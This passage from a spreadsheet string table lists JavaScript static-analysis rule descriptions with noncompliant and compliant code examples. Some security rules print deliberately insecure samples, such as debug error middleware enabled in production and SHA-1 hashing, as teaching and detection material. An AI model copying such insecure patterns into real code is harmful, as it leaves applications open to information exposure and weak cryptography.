}
&lt;/pre&gt;
&lt;h2&gt;Compliant Solution&lt;/h2&gt;
&lt;p&gt;Case 1&lt;/p&gt;
&lt;pre&gt;
switch (day) {
  case MONDAY:
  case TUESDAY:
  case WEDNESDAY:
    doSomething();
    break;
  ...
}
&lt;/pre&gt;
&lt;p&gt;Case 2&lt;/p&gt;
&lt;pre&gt;
switch (day) {
  case MONDAY:
    break;
  case TUESDAY:
    compute(args); // put the content of the labelled "for" statement in a dedicated method
    break;
    /* ... */
}
&lt;/pre&gt;</t>
  </si>
  <si>
    <t>javascript:S1321</t>
  </si>
  <si>
    <t>"with" statements should not be used</t>
  </si>
  <si>
    <t>&lt;p&gt;The use of the &lt;code&gt;with&lt;/code&gt; keyword produces an error in JavaScript strict mode code. However, thatâ€™s not the worst that can be said against
&lt;code&gt;with&lt;/code&gt;.&lt;/p&gt;
&lt;p&gt;Using &lt;code&gt;with&lt;/code&gt; allows a short-hand access to an objectâ€™s properties - assuming theyâ€™re already set. But use &lt;code&gt;with&lt;/code&gt; to access
some property not already set in the object, and suddenly youâ€™re catapulted out of the object scope and into the global scope, creating or overwriting
variables there. Since the effects of &lt;code&gt;with&lt;/code&gt; are entirely dependent on the object passed to it, &lt;code&gt;with&lt;/code&gt; can be dangerously
unpredictable, and should never be used.&lt;/p&gt;
&lt;h2&gt;Noncompliant Code Example&lt;/h2&gt;
&lt;pre&gt;
var x = 'a';
var foo = {
  y: 1
}
with (foo) {  // Noncompliant
  y = 4;  // updates foo.y
  x = 3;  // does NOT add a foo.x property; updates x var in outer scope
}
print(foo.x + " " + x); // shows: undefined 3
&lt;/pre&gt;
&lt;h2&gt;Compliant Solution&lt;/h2&gt;
&lt;pre&gt;
var x = 'a';
var foo = {
  y: 1
}
foo.y = 4;
foo.x = 3;
print(foo.x + " " + x); // shows: 3 a
&lt;/pre&gt;</t>
  </si>
  <si>
    <t>javascript:S3782</t>
  </si>
  <si>
    <t>Arguments to built-in functions should match documented types</t>
  </si>
  <si>
    <t>&lt;p&gt;The types of the arguments to built-in functions are specified in the JavaScript language specifications. Calls to these functions should conform
to the documented types, otherwise the result will most likely not be what was expected (e.g.: the call would always return &lt;code&gt;false&lt;/code&gt;).&lt;/p&gt;
&lt;h2&gt;Noncompliant Code Example&lt;/h2&gt;
&lt;pre&gt;
const isTooSmall = Math.abs(x &amp;lt; 0.0042);
&lt;/pre&gt;
&lt;h2&gt;Compliant Solution&lt;/h2&gt;
&lt;pre&gt;
const isTooSmall = Math.abs(x) &amp;lt; 0.0042;
&lt;/pre&gt;</t>
  </si>
  <si>
    <t>javascript:S3923</t>
  </si>
  <si>
    <t>All branches in a conditional structure should not have exactly the same implementation</t>
  </si>
  <si>
    <t>&lt;p&gt;Having all branches in a &lt;code&gt;switch&lt;/code&gt; or &lt;code&gt;if&lt;/code&gt; chain with the same implementation is an error. Either a copy-paste error was made
and something different should be executed, or there shouldnâ€™t be a &lt;code&gt;switch&lt;/code&gt;/&lt;code&gt;if&lt;/code&gt; chain at all.&lt;/p&gt;
&lt;h2&gt;Noncompliant Code Example&lt;/h2&gt;
&lt;pre&gt;
if (b == 0) {  // Noncompliant
  doOneMoreThing();
}
else {
  doOneMoreThing();
}
let a = (b == 0) ? getValue() : getValue();   // Noncompliant
switch (i) {  // Noncompliant
  case 1:
    doSomething();
    break;
  case 2:
    doSomething();
    break;
  case 3:
    doSomething();
    break;
  default:
    doSomething();
}
&lt;/pre&gt;
&lt;h2&gt;Exceptions&lt;/h2&gt;
&lt;p&gt;This rule does not apply to &lt;code&gt;if&lt;/code&gt; chains without &lt;code&gt;else&lt;/code&gt;-s, or to &lt;code&gt;switch&lt;/code&gt;-es without &lt;code&gt;default&lt;/code&gt;
clauses.&lt;/p&gt;
&lt;pre&gt;
if(b == 0) {    //no issue, this could have been done on purpose to make the code more readable
  doSomething();
} else if(b == 1) {
  doSomething();
}
&lt;/pre&gt;</t>
  </si>
  <si>
    <t>javascript:S131</t>
  </si>
  <si>
    <t>"switch" statements should have "default" clauses</t>
  </si>
  <si>
    <t>&lt;p&gt;The requirement for a final &lt;code&gt;default&lt;/code&gt; clause is defensive programming. The clause should either take appropriate action, or contain a
suitable comment as to why no action is taken.&lt;/p&gt;
&lt;h2&gt;Noncompliant Code Example&lt;/h2&gt;
&lt;pre&gt;
switch (param) {  //missing default clause
  case 0:
    doSomething();
    break;
  case 1:
    doSomethingElse();
    break;
}
switch (param) {
  default: // default clause should be the last one
    error();
    break;
  case 0:
    doSomething();
    break;
  case 1:
    doSomethingElse();
    break;
}
&lt;/pre&gt;
&lt;h2&gt;Compliant Solution&lt;/h2&gt;
&lt;pre&gt;
switch (param) {
  case 0:
    doSomething();
    break;
  case 1:
    doSomethingElse();
    break;
  default:
    error();
    break;
}
&lt;/pre&gt;
&lt;h2&gt;See&lt;/h2&gt;
&lt;ul&gt;
  &lt;li&gt; &lt;a href="http://cwe.mitre.org/data/definitions/478.html"&gt;MITRE, CWE-478&lt;/a&gt; - Missing Default Case in Switch Statement &lt;/li&gt;
&lt;/ul&gt;</t>
  </si>
  <si>
    <t>javascript:S1125</t>
  </si>
  <si>
    <t>Boolean literals should not be used in comparisons</t>
  </si>
  <si>
    <t>&lt;p&gt;Boolean literals should be avoided in comparison expressions &lt;code&gt;==&lt;/code&gt; and &lt;code&gt;!=&lt;/code&gt; to improve code readability.&lt;/p&gt;
&lt;p&gt;This rule also reports on redundant boolean operations.&lt;/p&gt;
&lt;h2&gt;Noncompliant Code Example&lt;/h2&gt;
&lt;pre&gt;
let someValue = "0";
// ...
if (someValue == true) { /* ... */ }
if (someBooleanValue != true) { /* ... */ }
doSomething(!false);
&lt;/pre&gt;
&lt;h2&gt;Compliant Solution&lt;/h2&gt;
&lt;pre&gt;
if (someValue &amp;amp;&amp;amp; someValue != "0") { /* ... */ }
if (!someBooleanValue) { /* ... */ }
doSomething(true);
&lt;/pre&gt;</t>
  </si>
  <si>
    <t>javascript:S4507</t>
  </si>
  <si>
    <t>Delivering code in production with debug features activated is security-sensitive</t>
  </si>
  <si>
    <t>&lt;p&gt;Delivering code in production with debug features activated is security-sensitive. It has led in the past to the following vulnerabilities:&lt;/p&gt;
&lt;ul&gt;
  &lt;li&gt; &lt;a href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-1999007"&gt;CVE-2018-1999007&lt;/a&gt; &lt;/li&gt;
  &lt;li&gt; &lt;a href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-5306"&gt;CVE-2015-5306&lt;/a&gt; &lt;/li&gt;
  &lt;li&gt; &lt;a href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-2006"&gt;CVE-2013-2006&lt;/a&gt; &lt;/li&gt;
&lt;/ul&gt;
&lt;p&gt;An applicationâ€™s debug features enable developers to find bugs more easily and thus facilitate also the work of attackers. It often gives access to
detailed information on both the system running the application and users.&lt;/p&gt;
&lt;h2&gt;Ask Yourself Whether&lt;/h2&gt;
&lt;ul&gt;
  &lt;li&gt; the code or configuration enabling the application debug features is deployed on production servers or distributed to end users. &lt;/li&gt;
  &lt;li&gt; the application runs by default with debug features activated. &lt;/li&gt;
&lt;/ul&gt;
&lt;p&gt;There is a risk if you answered yes to any of those questions.&lt;/p&gt;
&lt;h2&gt;Recommended Secure Coding Practices&lt;/h2&gt;
&lt;p&gt;Do not enable debug features on production servers or applications distributed to end users.&lt;/p&gt;
&lt;h2&gt;Sensitive Code Example&lt;/h2&gt;
&lt;p&gt;&lt;a href="https://www.npmjs.com/package/errorhandler"&gt;errorhandler Express.js middleware&lt;/a&gt; should not be used in production:&lt;/p&gt;
&lt;pre&gt;
const express = require('express');
const errorhandler = require('errorhandler');
let app = express();
app.use(errorhandler()); // Sensitive
&lt;/pre&gt;
&lt;h2&gt;Compliant Solution&lt;/h2&gt;
&lt;p&gt;&lt;a href="https://www.npmjs.com/package/errorhandler"&gt;errorhandler Express.js middleware&lt;/a&gt; used only in development mode:&lt;/p&gt;
&lt;pre&gt;
const express = require('express');
const errorhandler = require('errorhandler');
let app = express();
if (process.env.NODE_ENV === 'development') {  // Compliant
  app.use(errorhandler());  // Compliant
}
&lt;/pre&gt;
&lt;h2&gt;See&lt;/h2&gt;
&lt;ul&gt;
  &lt;li&gt; &lt;a href="https://www.owasp.org/index.php/Top_10-2017_A3-Sensitive_Data_Exposure"&gt;OWASP Top 10 2017 Category A3&lt;/a&gt; - Sensitive Data Exposure
  &lt;/li&gt;
  &lt;li&gt; &lt;a href="http://cwe.mitre.org/data/definitions/489.html"&gt;MITRE, CWE-489&lt;/a&gt; - Leftover Debug Code &lt;/li&gt;
  &lt;li&gt; &lt;a href="http://cwe.mitre.org/data/definitions/215.html"&gt;MITRE, CWE-215&lt;/a&gt; - Information Exposure Through Debug Information &lt;/li&gt;
&lt;/ul&gt;</t>
  </si>
  <si>
    <t>javascript:S1528</t>
  </si>
  <si>
    <t>Array constructors should not be used</t>
  </si>
  <si>
    <t>&lt;p&gt;Array literals should always be preferred to Array constructors.&lt;/p&gt;
&lt;p&gt;Array constructors are error-prone due to the way their arguments are interpreted. If more than one argument is used, the array length will be
equal to the number of arguments. However, using a single argument will have one of three consequences:&lt;/p&gt;
&lt;ul&gt;
  &lt;li&gt; If the argument is a number and it is a natural number the length will be equal to the value of the argument. &lt;/li&gt;
&lt;/ul&gt;
&lt;pre&gt;
let arr = new Array(3); // [empty Ã— 3]
&lt;/pre&gt;
&lt;ul&gt;
  &lt;li&gt; If the argument is a number, but not a natural number an exception will be thrown. &lt;/li&gt;
&lt;/ul&gt;
&lt;pre&gt;
let arr = new Array(3.14);  // RangeError: Invalid array length
&lt;/pre&gt;
&lt;ul&gt;
  &lt;li&gt; Otherwise the array will have one element with the argument as its value. &lt;/li&gt;
&lt;/ul&gt;
&lt;pre&gt;
let arr = new Array("3");  // ["3"]
&lt;/pre&gt;
&lt;p&gt;Note that even if you set the length of an array, it will be empty. That is, it will have the number of elements you declared, but they wonâ€™t
contain anything, so no callbacks will be applied to the array elements.&lt;/p&gt;
&lt;p&gt;For these reasons, if someone changes the code to pass 1 argument instead of 2 arguments, the array might not have the expected length. To avoid
these kinds of weird cases, always use the more readable array literal initialization format.&lt;/p&gt;
&lt;h2&gt;Noncompliant Code Example&lt;/h2&gt;
&lt;pre&gt;
let myArray = new Array(x1, x2, x3);   // Noncompliant. Results in 3-element array.
let emptyArray = new Array();          // Noncompliant. Results in 0-element array.
let unstableArray = new Array(n);      // Noncompliant. Variable in results.
let arr = new Array(3); // Noncompliant; empty array of length 3
arr.foreach((x) =&amp;gt; alert("Hello " + x)); // callback is not executed because there's nothing in arr
let anotherArr = arr.map(() =&amp;gt; 42); // anotherArr is also empty because callback didn't execute
&lt;/pre&gt;
&lt;h2&gt;Compliant Solution&lt;/h2&gt;
&lt;pre&gt;
let myArray = [x1, x2, x3];
let emptyArray = [];
// if "n" is the only array element
let unstableArray = [n];
// or,  if "n" is the array length (since ES 2015)
let unstableArray = Array.from({length: n});
let arr = ["Elena", "Mike", "Sarah"];
arr.foreach((x) =&amp;gt; alert("Hello " + x));
let anotherArr = arr.map(() =&amp;gt; 42);  // anotherArr now holds 42 in each element
&lt;/pre&gt;</t>
  </si>
  <si>
    <t>javascript:S3504</t>
  </si>
  <si>
    <t>Variables should be declared with "let" or "const"</t>
  </si>
  <si>
    <t>&lt;p&gt;ECMAScript 2015 introduced the &lt;code&gt;let&lt;/code&gt; and &lt;code&gt;const&lt;/code&gt; keywords for block-scope variable declaration. Using &lt;code&gt;const&lt;/code&gt;
creates a read-only (constant) variable.&lt;/p&gt;
&lt;p&gt;The distinction between the variable types created by &lt;code&gt;var&lt;/code&gt; and by &lt;code&gt;let&lt;/code&gt; is significant, and a switch to &lt;code&gt;let&lt;/code&gt;
will help alleviate many of the variable scope issues which have caused confusion in the past.&lt;/p&gt;
&lt;p&gt;Because these new keywords create more precise variable types, they are preferred in environments that support ECMAScript 2015. However, some
refactoring may be required by the switch from &lt;code&gt;var&lt;/code&gt; to &lt;code&gt;let&lt;/code&gt;, and you should be aware that they raise &lt;code&gt;SyntaxError&lt;/code&gt;s
in pre-ECMAScript 2015 environments.&lt;/p&gt;
&lt;p&gt;This rule raises an issue when &lt;code&gt;var&lt;/code&gt; is used instead of &lt;code&gt;const&lt;/code&gt; or &lt;code&gt;let&lt;/code&gt;.&lt;/p&gt;
&lt;h2&gt;Noncompliant Code Example&lt;/h2&gt;
&lt;pre&gt;
var color = "blue";
var size = 4;
&lt;/pre&gt;
&lt;h2&gt;Compliant Solution&lt;/h2&gt;
&lt;pre&gt;
const color = "blue";
let size = 4;
&lt;/pre&gt;</t>
  </si>
  <si>
    <t>javascript:S3796</t>
  </si>
  <si>
    <t>Callbacks of array methods should have return statements</t>
  </si>
  <si>
    <t>&lt;p&gt;Arrays in JavaScript have several methods for filtering, mapping, or folding that require a callback. Not having a return statement in such a
callback function is most likely a mistake, because processing of the array uses the return value of the callback. If there is no return, callback
will implicitly return &lt;code&gt;undefined&lt;/code&gt;, which will likely fail.&lt;/p&gt;
&lt;p&gt;This rule applies for the following methods of an array:&lt;/p&gt;
&lt;ul&gt;
  &lt;li&gt; &lt;code&gt;Array.from&lt;/code&gt; &lt;/li&gt;
  &lt;li&gt; &lt;code&gt;Array.prototype.every&lt;/code&gt; &lt;/li&gt;
  &lt;li&gt; &lt;code&gt;Array.prototype.filter&lt;/code&gt; &lt;/li&gt;
  &lt;li&gt; &lt;code&gt;Array.prototype.find&lt;/code&gt; &lt;/li&gt;
  &lt;li&gt; &lt;code&gt;Array.prototype.findIndex&lt;/code&gt; &lt;/li&gt;
  &lt;li&gt; &lt;code&gt;Array.prototype.map&lt;/code&gt; &lt;/li&gt;
  &lt;li&gt; &lt;code&gt;Array.prototype.reduce&lt;/code&gt; &lt;/li&gt;
  &lt;li&gt; &lt;code&gt;Array.prototype.reduceRight&lt;/code&gt; &lt;/li&gt;
  &lt;li&gt; &lt;code&gt;Array.prototype.some&lt;/code&gt; &lt;/li&gt;
  &lt;li&gt; &lt;code&gt;Array.prototype.sort&lt;/code&gt; &lt;/li&gt;
&lt;/ul&gt;
&lt;h2&gt;Noncompliant Code Example&lt;/h2&gt;
&lt;pre&gt;
let arr = ["a", "b", "c"];
let merged = arr.reduce(function(a, b) {
  a.concat(b);
}); // Noncompliant: No return statement, will result in TypeError
&lt;/pre&gt;
&lt;h2&gt;Compliant Solution&lt;/h2&gt;
&lt;pre&gt;
let arr = ["a", "b", "c"];
let merged = arr.reduce(function(a, b) {
  return a.concat(b);
}); // merged === "abc"
&lt;/pre&gt;</t>
  </si>
  <si>
    <t>javascript:S3799</t>
  </si>
  <si>
    <t>Destructuring patterns should not be empty</t>
  </si>
  <si>
    <t>&lt;p&gt;Destructuring is a convenient way of extracting multiple values from data stored in (possibly nested) objects and arrays. However, it is possible
to create an empty pattern that has no effect. When empty curly braces or brackets are used to the right of a property name most of the time the
intent was to use a default value instead.&lt;/p&gt;
&lt;p&gt;This rule raises an issue when empty destructuring pattern is used.&lt;/p&gt;
&lt;h2&gt;Noncompliant Code Example&lt;/h2&gt;
&lt;pre&gt;
var {a: {}, b} = myObj; // Noncompliant
function foo({first: [], second}) { // Noncompliant
  // ...
}
&lt;/pre&gt;
&lt;h2&gt;Compliant Solution&lt;/h2&gt;
&lt;pre&gt;
var {a = {}, b} = myObj;
function foo({first = [], second}) {
  // ...
}
&lt;/pre&gt;</t>
  </si>
  <si>
    <t>javascript:S3758</t>
  </si>
  <si>
    <t>Values not convertible to numbers should not be used in numeric comparisons</t>
  </si>
  <si>
    <t>&lt;p&gt;In a Zen-like manner, &lt;code&gt;NaN&lt;/code&gt; isnâ€™t equal to anything, even itself. So comparisons (&lt;code&gt;&amp;gt;, &amp;lt;, &amp;gt;=, &amp;lt;=&lt;/code&gt;) where one
operand is &lt;code&gt;NaN&lt;/code&gt; or evaluates to &lt;code&gt;NaN&lt;/code&gt; always return &lt;code&gt;false&lt;/code&gt;. Specifically, &lt;code&gt;undefined&lt;/code&gt; and objects that
cannot be converted to numbers evaluate to &lt;code&gt;NaN&lt;/code&gt; when used in numerical comparisons.&lt;/p&gt;
&lt;p&gt;This rule raises an issue when there is at least one path through the code where one of the operands to a comparison is &lt;code&gt;NaN&lt;/code&gt;,
&lt;code&gt;undefined&lt;/code&gt; or an &lt;code&gt;Object&lt;/code&gt; which cannot be converted to a number.&lt;/p&gt;
&lt;h2&gt;Noncompliant Code Example&lt;/h2&gt;
&lt;pre&gt;
var x;  // x is currently "undefined"
if (someCondition()) {
  x = 42;
}
if (42 &amp;gt; x) {  // Noncompliant; "x" might still be "undefined"
  doSomething();
}
var obj = {prop: 42};
if (obj &amp;gt; 24) { // Noncompliant
  doSomething();
}
&lt;/pre&gt;
&lt;h2&gt;Compliant Solution&lt;/h2&gt;
&lt;pre&gt;
var x;
if (someCondition()) {
  x = 42;
} else {
  x = foo();
}
if (42 &amp;gt; x) {
  doSomething();
}
var obj = {prop: 42};
if (obj.prop &amp;gt; 24) {
  doSomething();
}
&lt;/pre&gt;</t>
  </si>
  <si>
    <t>javascript:S2703</t>
  </si>
  <si>
    <t>Variables should be declared explicitly</t>
  </si>
  <si>
    <t>&lt;p&gt;JavaScript variable scope can be particularly difficult to understand and get right. The situation gets even worse when you consider the
&lt;em&gt;accidental&lt;/em&gt; creation of global variables, which is what happens when you declare a variable inside a function or the &lt;code&gt;for&lt;/code&gt; clause
of a for-loop without using the &lt;code&gt;let&lt;/code&gt;, &lt;code&gt;const&lt;/code&gt; or &lt;code&gt;var&lt;/code&gt; keywords.&lt;/p&gt;
&lt;p&gt;&lt;code&gt;let&lt;/code&gt; and &lt;code&gt;const&lt;/code&gt; were introduced in ECMAScript 2015, and are now the preferred keywords for variable declaration.&lt;/p&gt;
&lt;h2&gt;Noncompliant Code Example&lt;/h2&gt;
&lt;pre&gt;
function f(){
  i = 1;         // Noncompliant; i is global
  for (j = 0; j &amp;lt; array.length; j++) {  // Noncompliant; j is global now too
    // ...
  }
}
&lt;/pre&gt;
&lt;h2&gt;Compliant Solution&lt;/h2&gt;
&lt;pre&gt;
function f(){
  var i = 1;
  for (let j = 0; j &amp;lt; array.length; j++) {
    // ...
  }
}
&lt;/pre&gt;</t>
  </si>
  <si>
    <t>javascript:S1526</t>
  </si>
  <si>
    <t>Variables declared with "var" should be declared before they are used</t>
  </si>
  <si>
    <t>&lt;p&gt;Variables declared with &lt;code&gt;var&lt;/code&gt; have the special property that regardless of where theyâ€™re declared in a function they "float" to the top
of the function and are available for use even before theyâ€™re declared. That makes scoping confusing, especially for new coders.&lt;/p&gt;
&lt;p&gt;To keep confusion to a minimum, &lt;code&gt;var&lt;/code&gt; declarations should happen before they are used for the first time.&lt;/p&gt;
&lt;h2&gt;Noncompliant Code Example&lt;/h2&gt;
&lt;pre&gt;
var x = 1;
function fun(){
  alert(x); // Noncompliant as x is declared later in the same scope
  if(something) {
    var x = 42; // Declaration in function scope (not block scope!) shadows global variable
  }
}
fun(); // Unexpectedly alerts "undefined" instead of "1"
&lt;/pre&gt;
&lt;h2&gt;Compliant Solution&lt;/h2&gt;
&lt;pre&gt;
var x = 1;
function fun() {
  print(x);
  if (something) {
    x = 42;
  }
}
fun(); // Print "1"
&lt;/pre&gt;</t>
  </si>
  <si>
    <t>javascript:S2814</t>
  </si>
  <si>
    <t>Variables and functions should not be redeclared</t>
  </si>
  <si>
    <t>&lt;p&gt;This rule checks that a declaration doesnâ€™t use a name that is already in use. Indeed, it is possible to use the same symbol multiple times as
either a variable or a function, but doing so is likely to confuse maintainers. Further itâ€™s possible that such reassignments are made in error, with
the developer not realizing that the value of the variable is overwritten by the new assignment.&lt;/p&gt;
&lt;p&gt;This rule also applies to function parameters.&lt;/p&gt;
&lt;h2&gt;Noncompliant Code Example&lt;/h2&gt;
&lt;pre&gt;
var a = 'foo';
function a() {}   // Noncompliant
console.log(a);   // prints "foo"
function myFunc(arg) {
  var arg = "event"; // Noncompliant, argument value is lost
}
fun(); // prints "bar"
function fun() {
  console.log("foo");
}
fun(); // prints "bar"
function fun() {  // Noncompliant
  console.log("bar");
}
fun(); // prints "bar"
&lt;/pre&gt;
&lt;h2&gt;Compliant Solution&lt;/h2&gt;
&lt;pre&gt;
var a = 'foo';
function otherName() {}
console.log(a);
function myFunc(arg) {
  var newName = "event";
}
fun(); // prints "foo"
function fun() {
  print("foo");
}
fun(); // prints "foo"
function printBar() {
  print("bar");
}
printBar(); // prints "bar"
&lt;/pre&gt;</t>
  </si>
  <si>
    <t>javascript:S4790</t>
  </si>
  <si>
    <t>Using weak hashing algorithms is security-sensitive</t>
  </si>
  <si>
    <t>&lt;p&gt;Cryptographic hash algorithms such as &lt;code&gt;MD2&lt;/code&gt;, &lt;code&gt;MD4&lt;/code&gt;, &lt;code&gt;MD5&lt;/code&gt;, &lt;code&gt;MD6&lt;/code&gt;, &lt;code&gt;HAVAL-128&lt;/code&gt;,
&lt;code&gt;HMAC-MD5&lt;/code&gt;, &lt;code&gt;DSA&lt;/code&gt; (which uses &lt;code&gt;SHA-1&lt;/code&gt;), &lt;code&gt;RIPEMD&lt;/code&gt;, &lt;code&gt;RIPEMD-128&lt;/code&gt;, &lt;code&gt;RIPEMD-160&lt;/code&gt;,
&lt;code&gt;HMACRIPEMD160&lt;/code&gt; and &lt;code&gt;SHA-1&lt;/code&gt; are no longer considered secure, because it is possible to have &lt;code&gt;collisions&lt;/code&gt; (little
computational effort is enough to find two or more different inputs that produce the same hash).&lt;/p&gt;
&lt;h2&gt;Ask Yourself Whether&lt;/h2&gt;
&lt;p&gt;The hashed value is used in a security context like:&lt;/p&gt;
&lt;ul&gt;
  &lt;li&gt; User-password storage. &lt;/li&gt;
  &lt;li&gt; Security token generation (used to confirm e-mail when registering on a website, reset password, etc â€¦â€‹). &lt;/li&gt;
  &lt;li&gt; To compute some message integrity. &lt;/li&gt;
&lt;/ul&gt;
&lt;p&gt;There is a risk if you answered yes to any of those questions.&lt;/p&gt;
&lt;h2&gt;Recommended Secure Coding Practices&lt;/h2&gt;
&lt;p&gt;Safer alternatives, such as &lt;code&gt;SHA-256&lt;/code&gt;, &lt;code&gt;SHA-512&lt;/code&gt;, &lt;code&gt;SHA-3&lt;/code&gt; are recommended, and for password hashing, itâ€™s even
better to use algorithms that do not compute too "quickly", like &lt;code&gt;bcrypt&lt;/code&gt;, &lt;code&gt;scrypt&lt;/code&gt;, &lt;code&gt;argon2&lt;/code&gt; or &lt;code&gt;pbkdf2&lt;/code&gt;
because it slows down &lt;code&gt;brute force attacks&lt;/code&gt;.&lt;/p&gt;
&lt;h2&gt;Sensitive Code Example&lt;/h2&gt;
&lt;pre&gt;
const crypto = require("crypto");
const hash = crypto.createHash('sha1'); // Sensitive
&lt;/pre&gt;
&lt;h2&gt;Compliant Solution&lt;/h2&gt;
&lt;pre&gt;
const crypto = require("crypto");
const hash = crypto.createHash('sha512'); // Compliant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href="https://mobile-security.gitbook.io/masvs/security-requirements/0x08-v3-cryptography_verification_requirements"&gt;Mobile AppSec
  Verification Standard&lt;/a&gt; - Cryptography Requirements &lt;/li&gt;
  &lt;li&gt; &lt;a href="https://owasp.org/www-project-mobile-top-10/2016-risks/m5-insufficient-cryptography"&gt;OWASP Mobile Top 10 2016 Category M5&lt;/a&gt; -
  Insufficient Cryptography &lt;/li&gt;
  &lt;li&gt; &lt;a href="https://cwe.mitre.org/data/definitions/327.html"&gt;MITRE, CWE-327&lt;/a&gt; - Use of a Broken or Risky Cryptographic Algorithm &lt;/li&gt;
  &lt;li&gt; &lt;a href="https://cwe.mitre.org/data/definitions/916.html"&gt;MITRE, CWE-916&lt;/a&gt; - Use of Password Hash With Insufficient Computational Effort
  &lt;/li&gt;
  &lt;li&gt; &lt;a href="https://www.sans.org/top25-software-errors/#cat3"&gt;SANS Top 25&lt;/a&gt; - Porous Defenses &lt;/li&gt;
&lt;/ul&gt;</t>
  </si>
  <si>
    <t>javascript:S4818</t>
  </si>
  <si>
    <t>Using Sockets is security-sensitive</t>
  </si>
  <si>
    <t>&lt;p&gt;Using sockets is security-sensitive. It has led in the past to the following vulnerabilities:&lt;/p&gt;
&lt;ul&gt;
  &lt;li&gt; &lt;a href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2011-1785"&gt;CVE-2011-178&lt;/a&gt; &lt;/li&gt;
  &lt;li&gt; &lt;a href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-5645"&gt;CVE-2017-5645&lt;/a&gt; &lt;/li&gt;
  &lt;li&gt; &lt;a href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-6597"&gt;CVE-2018-6597&lt;/a&gt; &lt;/li&gt;
&lt;/ul&gt;
&lt;p&gt;Sockets are vulnerable in multiple ways:&lt;/p&gt;
&lt;ul&gt;
  &lt;li&gt; They enable a software to interact with the outside world. As this world is full of attackers it is necessary to check that they cannot receive
  sensitive information or inject dangerous input. &lt;/li&gt;
  &lt;li&gt; The number of sockets is limited and can be exhausted. Which makes the application unresponsive to users who need additional sockets. &lt;/li&gt;
&lt;/ul&gt;
&lt;p&gt;This rules flags code that creates sockets. It matches only the direct use of sockets, not use through frameworks or high-level APIs such as the
use of http connections.&lt;/p&gt;
&lt;h2&gt;Ask Yourself Whether&lt;/h2&gt;
&lt;ul&gt;
  &lt;li&gt; sockets are created without any limit every time a user performs an action. &lt;/li&gt;
  &lt;li&gt; input received from sockets is used without being sanitized. &lt;/li&gt;
  &lt;li&gt; sensitive data is sent via sockets without being encrypted. &lt;/li&gt;
&lt;/ul&gt;
&lt;p&gt;There is a risk if you answered yes to any of those questions.&lt;/p&gt;
&lt;h2&gt;Recommended Secure Coding Practices&lt;/h2&gt;
&lt;ul&gt;
  &lt;li&gt; In many cases there is no need to open a socket yourself. Use instead libraries and existing protocols. &lt;/li&gt;
  &lt;li&gt; Encrypt all data sent if it is sensitive. Usually it is better to encrypt it even if the data is not sensitive as it might change later. &lt;/li&gt;
  &lt;li&gt; &lt;a href="https://www.owasp.org/index.php/Input_Validation_Cheat_Sheet"&gt;Sanitize&lt;/a&gt; any input read from the socket. &lt;/li&gt;
  &lt;li&gt; Limit the number of sockets a given user can create. Close the sockets as soon as possible. &lt;/li&gt;
&lt;/ul&gt;
&lt;h2&gt;Sensitive Code Example&lt;/h2&gt;
&lt;pre&gt;
const net = require('net');
var socket = new net.Socket(); // Sensitive
socket.connect(80, 'google.com');
// net.createConnection creates a new net.Socket, initiates connection with socket.connect(), then returns the net.Socket that starts the connection
net.createConnection({ port: port }, () =&amp;gt; {}); // Sensitive
// net.connect is an alias to net.createConnection
net.connect({ port: port }, () =&amp;gt; {}); // Sensitive
&lt;/pre&gt;
&lt;h2&gt;See&lt;/h2&gt;
&lt;ul&gt;
  &lt;li&gt; &lt;a href="https://www.owasp.org/index.php/Top_10-2017_A3-Sensitive_Data_Exposure"&gt;OWASP Top 10 2017 Category A3&lt;/a&gt; - Sensitive Data Exposure
  &lt;/li&gt;
  &lt;li&gt; &lt;a href="http://cwe.mitre.org/data/definitions/20"&gt;MITRE, CWE-20&lt;/a&gt; - Improper Input Validation &lt;/li&gt;
  &lt;li&gt; &lt;a href="http://cwe.mitre.org/data/definitions/400"&gt;MITRE, CWE-400&lt;/a&gt; - Uncontrolled Resource Consumption ('Resource Exhaustion') &lt;/li&gt;
  &lt;li&gt; &lt;a href="http://cwe.mitre.org/data/definitions/200"&gt;MITRE, CWE-200&lt;/a&gt; - Exposure of Sensitive Information to an Unauthorized Actor &lt;/li&gt;
  &lt;li&gt; &lt;a href="https://www.sans.org/top25-software-errors/#cat2"&gt;SANS Top 25&lt;/a&gt; - Risky Resource Management &lt;/li&gt;
  &lt;li&gt; &lt;a href="https://www.sans.org/top25-software-errors/#cat3"&gt;SANS Top 25&lt;/a&gt; - Porous Defenses &lt;/li&gt;
&lt;/ul&gt;
&lt;h2&gt;Deprecated&lt;/h2&gt;
&lt;p&gt;This rule is deprecated, and will eventually be removed.&lt;/p&gt;</t>
  </si>
  <si>
    <t>javascript:S2255</t>
  </si>
  <si>
    <t>Writing cookies is security-sensitive</t>
  </si>
  <si>
    <t>&lt;p&gt;Using cookies is security-sensitive. It has led in the past to the following vulnerabilities:&lt;/p&gt;
&lt;ul&gt;
  &lt;li&gt; &lt;a href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-11639"&gt;CVE-2018-11639&lt;/a&gt; &lt;/li&gt;
  &lt;li&gt; &lt;a href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-6537"&gt;CVE-2016-6537&lt;/a&gt; &lt;/li&gt;
&lt;/ul&gt;
&lt;p&gt;Attackers can use widely-available tools to read cookies. Any sensitive information they may contain will be exposed.&lt;/p&gt;
&lt;p&gt;This rule flags code that writes cookies.&lt;/p&gt;
&lt;h2&gt;Ask Yourself Whether&lt;/h2&gt;
&lt;ul&gt;
  &lt;li&gt; sensitive information is stored inside the cookie. &lt;/li&gt;
&lt;/ul&gt;
&lt;p&gt;You are at risk if you answered yes to this question.&lt;/p&gt;
&lt;h2&gt;Recommended Secure Coding Practices&lt;/h2&gt;
&lt;p&gt;Cookies should only be used to manage the user session. The best practice is to keep all user-related information server-side and link them to the
user session, never sending them to the client. In a very few corner cases, cookies can be used for non-sensitive information that need to live longer
than the user session.&lt;/p&gt;
&lt;p&gt;Do not try to encode sensitive information in a non human-readable format before writing them in a cookie. The encoding can be reverted and the
original information will be exposed.&lt;/p&gt;
&lt;p&gt;Using cookies only for session IDs doesnâ€™t make them secure. Follow &lt;a
